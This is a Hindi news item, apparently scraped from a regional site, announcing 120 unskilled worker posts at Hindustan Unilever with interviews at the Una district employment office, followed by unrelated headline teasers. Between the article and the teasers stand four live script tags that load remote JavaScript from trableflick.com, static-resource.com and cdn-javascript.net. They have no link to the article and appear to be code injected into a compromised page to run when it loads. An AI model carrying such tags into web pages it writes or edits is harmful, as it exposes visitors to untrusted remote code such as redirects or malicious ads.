<p>हिन्दुस्तान यूनिलिवर लिमिटिड, किरपालपुर, तहसील नालागढ़, जिला सोलन द्वारा अकुशल कामगारों के 120 पद अधिसूचित किए गए हैं। इन पदों के लिए जिला रोजगार कार्यालय ऊना में 27 जनवरी को सुबह 11 बजे से साक्षात्कार का आयोजन किया जा रहा है। यह जानकारी आज जिला रोजगार अधिकारी अनीता गौतम ने दी। अनीता गौतम ने बताया कि साक्षात्कार में भाग लेने के लिए 18 से 40 साल आयु वर्ग के पुरूष आवेदक पात्र होंगे और इसके लिए न्यूनतम शैक्षणिक योग्यता 8वीं पास निर्धारित की गई। साक्षात्कार में चयनित आवेदकों को कंपनी द्वारा 8745 रूपये प्रति माह बतौर वेतन दिए जाएंगे।</p>
<p>उन्होंने बताया कि साक्षात्कार में भाग लेने के लिए आवेदक को अपने साथ योग्यता औऱ जन्मतिथि प्रमाण पत्र, रोजगार कार्यालय पंजीकरण कार्ड, हिमाचली बोनोफाईड, आधारकार्ड नंबर औऱ पासपोर्ट साईज फोटो साथ लेकर आना होगा। साक्षात्कार में भाग लेने के लिए किसी भी प्रकार का यात्रा अथवा दैनिक भत्ता देय नहीं होगा। अधिक जानकारी के लिए दूरभाष नंबर 83929-49487 पर संपर्क किया जा सकता है।</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1579943907459″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2″ type=”text/javascript”></script>
Shanta Kumar road accident prevention: पूर्व मुख्यमंत्री और पूर्व केंद्रीय मंत्री शांता कुमार ने केंद्रीय…
Ballot paper elections in India: हिमाचल प्रदेश के मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू ने देश…
Tragic Road Accident in Sirmour; सिरमौर जिले के पांवटा साहिब की तहसील में आंज भोज…
Mumbai: अजित पवार गुट के NCP नेता और पूर्व विधायक बाबा सिद्दीकी की शनिवार रात…
Kullu Dussehra Begins: राज्यपाल शिव प्रताप शुक्ल ने रविवार को कुल्लू के रथ मैदान में…
International Kullu Dussehra: जिला कुल्लू के मुख्यालय ढालपुर मैदान में आज से अंतरराष्ट्रीय दशहरा उत्सव…